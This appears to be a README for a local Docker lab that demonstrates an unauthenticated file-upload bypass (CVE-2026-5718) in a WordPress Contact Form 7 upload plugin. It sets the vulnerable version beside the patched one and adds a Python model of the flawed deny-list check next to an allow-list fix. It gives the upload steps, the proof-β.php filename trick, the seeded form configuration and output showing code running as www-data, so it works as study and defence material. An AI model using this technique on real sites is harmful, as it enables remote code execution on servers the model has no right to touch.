## https://sploitus.com/exploit?id=1ADBABA8-FF70-5B1B-9087-36F63592123B
# CVE-2026-5718 Local Docker Lab
Local-only vulnerable vs patched Docker lab for **CVE-2026-5718**, affecting the WordPress plugin **Drag and Drop Multiple File Upload for Contact Form 7**.
This lab demonstrates the difference between the vulnerable version `1.3.9.6` and the patched version `1.3.9.7` using a least-harm PHP execution proof inside a Docker-only environment.
> Scope: localhost / Docker network only. Do not use this PoC against systems you do not own or do not have explicit permission to test.
---
## Executive Summary
CVE-2026-5718 is an unauthenticated arbitrary file upload vulnerability in Drag and Drop Multiple File Upload for Contact Form 7 up to and including version `1.3.9.6`.
The bypass needs two conditions: the upload field is configured with custom blacklist types, and the uploaded filename contains non-ASCII characters. Under those conditions the vulnerable version stores a `.php` upload with its extension intact, so the file runs if the web server serves PHP from the upload directory. Version `1.3.9.7` rejects the same upload.
This repository runs two local WordPress services:
* `vuln` on `http://localhost:8081` with plugin version `1.3.9.6`
* `patched` on `http://localhost:8082` with plugin version `1.3.9.7`
---
## Lab Architecture
```text
Host
├── http://localhost:8081 -> vulnerable WordPress service
└── http://localhost:8082 -> patched WordPress service
Docker network
├── vuln
├── vuln-db
├── patched
└── patched-db
```
| Service | Purpose | Host Port | Version |
| ------------ | ------------------------------------- | --------: | ---------------- |
| `vuln` | Vulnerable WordPress lab | `8081` | Plugin `1.3.9.6` |
| `patched` | Patched WordPress lab | `8082` | Plugin `1.3.9.7` |
| `vuln-db` | MySQL database for vulnerable service | internal | MySQL 8.0 |
| `patched-db` | MySQL database for patched service | internal | MySQL 8.0 |
---
## Repository Structure
```text
.
├── docker-compose.yml
├── patched
│   └── Dockerfile
├── poc
│   └── poc.py
├── requirements.txt
├── scripts
│   └── seed-wordpress.sh
└── vuln
    └── Dockerfile
```
---
## Vulnerability Flow
The seeded Contact Form 7 form contains a Drag and Drop Multiple File Upload field:
```text
[mfile upload-file filetypes:* blacklist-types:zip limit:1048576]
```
The PoC uploads a PHP proof file named:
```text
proof-β.php
```
The `β` character is non-ASCII. This matters because the vulnerability depends on how the plugin handles filenames containing non-ASCII input.
High-level flow:
```text
PoC
↓
Fetch lab page and extract DnD CF7 AJAX nonce
↓
Upload proof-β.php through wp-admin/admin-ajax.php
↓
Vulnerable 1.3.9.6 accepts and stores the file as .php
↓
PoC requests the uploaded file
↓
Vulnerable lab executes the PHP proof as www-data
```
Patched flow:
```text
PoC
↓
Upload the same proof-β.php file
↓
Patched 1.3.9.7 rejects the upload
↓
No PHP file is stored and no code execution occurs
```
---
## Local RCE Proof Design
The uploaded PHP proof is intentionally minimal: it prints a fixed marker line followed by the output of `whoami` and `id`, which is enough to show the execution context. It does not use a reverse shell, persistence, credential access, lateral movement, network scanning, or destructive actions.
The vulnerable service intentionally allows PHP execution in the plugin upload directory so the impact is observable in this local lab. The patched service keeps the safer behavior and rejects the upload at the application validation layer.
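An added example of the validation-layer point, written for this page and not taken from the plugin or this repository. `fragile_is_blocked` is a simplified model of the bug class (a deny-list whose decision is skipped when the name contains characters it did not expect); it is not a reconstruction of what `1.3.9.6` does. `hardened_check` and `stored_name` show the allow-list alternative that decides on the normalised name and never writes the user-supplied name to disk. The extension sets are assumptions chosen for illustration.

```python
"""Added example (not the plugin's code): a fail-open deny-list model beside
an allow-list check made on the exact name that would be written."""
import re
import unicodedata
import uuid

# Illustrative sets, not the plugin's configuration.
DANGEROUS = {"php", "phtml", "php3", "php4", "php5", "php7", "phps", "phar", "htaccess"}
ALLOWED = {"pdf", "png", "jpg", "jpeg", "gif", "txt"}

# Model of the fragile pattern: an anchored ASCII-only regex. A name with any
# character outside [A-Za-z0-9._-] never matches, the extension is never
# inspected, and the function falls open to "not blocked".
_ASCII_NAME = re.compile(r"^[A-Za-z0-9._-]+\.([A-Za-z0-9]+)$")


def fragile_is_blocked(filename: str, blacklist: set = DANGEROUS) -> bool:
    """Deny-list check that is bypassed by a single non-ASCII character."""
    match = _ASCII_NAME.match(filename)
    if not match:
        return False            # fail-open: unexpected input skips the check
    return match.group(1).lower() in blacklist


def hardened_check(filename: str, allowlist: set = ALLOWED) -> tuple:
    """Allow-list decision on the NFC-normalised name; returns (ok, detail)."""
    name = unicodedata.normalize("NFC", filename)
    if any(ord(c) < 0x20 or c in "/\\\x7f" for c in name):
        return False, "control or path character in name"
    if name != name.strip() or name.startswith("."):
        return False, "hidden or padded name"
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    # Every dotted segment after the base name is examined, so shell.php.pdf
    # is rejected even though its final extension would pass the allow-list.
    exts = [p.lower() for p in parts[1:]]
    if any(e in DANGEROUS for e in exts):
        return False, f"dangerous extension segment: {exts}"
    if exts[-1] not in allowlist:
        return False, f"extension not allowed: {exts[-1]}"
    return True, exts[-1]


def stored_name(filename: str) -> str:
    """Never write the user's name: keep only the vetted extension."""
    ok, detail = hardened_check(filename)
    if not ok:
        raise ValueError(detail)
    return f"{uuid.uuid4().hex}.{detail}"
```

The non-ASCII name passes the deny-list model because the check is skipped, not because `php` stopped being dangerous; the allow-list version rejects it for the extension regardless of the other characters. Application-layer validation is still only one layer: the web server must also refuse to execute scripts in the upload directory, which is exactly the setting the vulnerable service relaxes on purpose.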
---
## Requirements
* Docker Desktop
* Docker Compose v2
* Python 3
Install Python dependencies:
```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```
---
## Build and Run
Start from a clean state:
```bash
docker compose down -v
docker compose up --build -d
```
Check service status:
```bash
docker compose ps
```
Open the lab pages:
```text
http://localhost:8081/cve-2026-5718-lab/
http://localhost:8082/cve-2026-5718-lab/
```
---
## Run the PoC
Run against the vulnerable service:
```bash
python poc/poc.py --base-url http://localhost:8081
```
Run against the patched service:
```bash
python poc/poc.py --base-url http://localhost:8082
```
The PoC only accepts localhost or loopback targets.
---
## Expected Result
### Vulnerable Service
Expected behavior:
* The upload is accepted.
* The uploaded filename remains a `.php` file.
* The uploaded PHP proof executes as the web server user.
Example output:
```text
Upload response:
{"success":true,"data":{"path":"cve5718proof","file":"proof-\u03b2.php"}}
Proof response:
CVE_2026_5718_LOCAL_RCE_PROOF
whoami=www-data
id=uid=33(www-data) gid=33(www-data) groups=33(www-data)
[result] VULNERABLE behavior observed: uploaded PHP proof executed.
```
### Patched Service
Expected behavior:
* The same upload is rejected.
* The PHP proof is not stored as an executable file.
* No code execution occurs.
Example output:
```text
Upload response:
{"success":false,"data":"Uploaded file is not allowed for file type"}
[result] Upload rejected by the application.
[result] Reason: Uploaded file is not allowed for file type
```
---
## Safety Notes
This lab is intentionally restricted to local testing.
The PoC:
* blocks non-localhost targets,
* does not use a reverse shell,
* does not perform persistence,
* does not read secrets,
* does not scan networks,
* only executes `whoami` and `id` inside the vulnerable container.
The vulnerable service relaxes upload-directory PHP execution only to make the local proof observable. Do not copy that configuration to production.
---
## Cleanup
Stop containers:
```bash
docker compose down
```
Remove containers and volumes:
```bash
docker compose down -v
```
Remove the Python virtual environment:
```bash
rm -rf .venv
```
---
## References
* NVD: CVE-2026-5718
[https://nvd.nist.gov/vuln/detail/CVE-2026-5718](https://nvd.nist.gov/vuln/detail/CVE-2026-5718)
* Patchstack advisory: WordPress Drag and Drop Multiple File Upload for Contact Form 7 Plugin <= 1.3.9.6 - Unauthenticated Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass
[https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability](https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability)
* Wordfence Intelligence: Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.9.6 - Unauthenticated Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass
[https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass)
* GitHub Advisory Database: GHSA-xj7v-jqv6-v48w
[https://github.com/advisories/GHSA-xj7v-jqv6-v48w](https://github.com/advisories/GHSA-xj7v-jqv6-v48w)
* WordPress.org plugin page: Drag and Drop Multiple File Upload for Contact Form 7
[https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/](https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/)
* Plugin vendor page: Drag & Drop Multiple File Upload for Contact Form 7
[https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/](https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/)
---
## Disclaimer
This repository is for educational and defensive security research only. It is designed to run only on localhost using Docker. Do not use the PoC against public or third-party systems.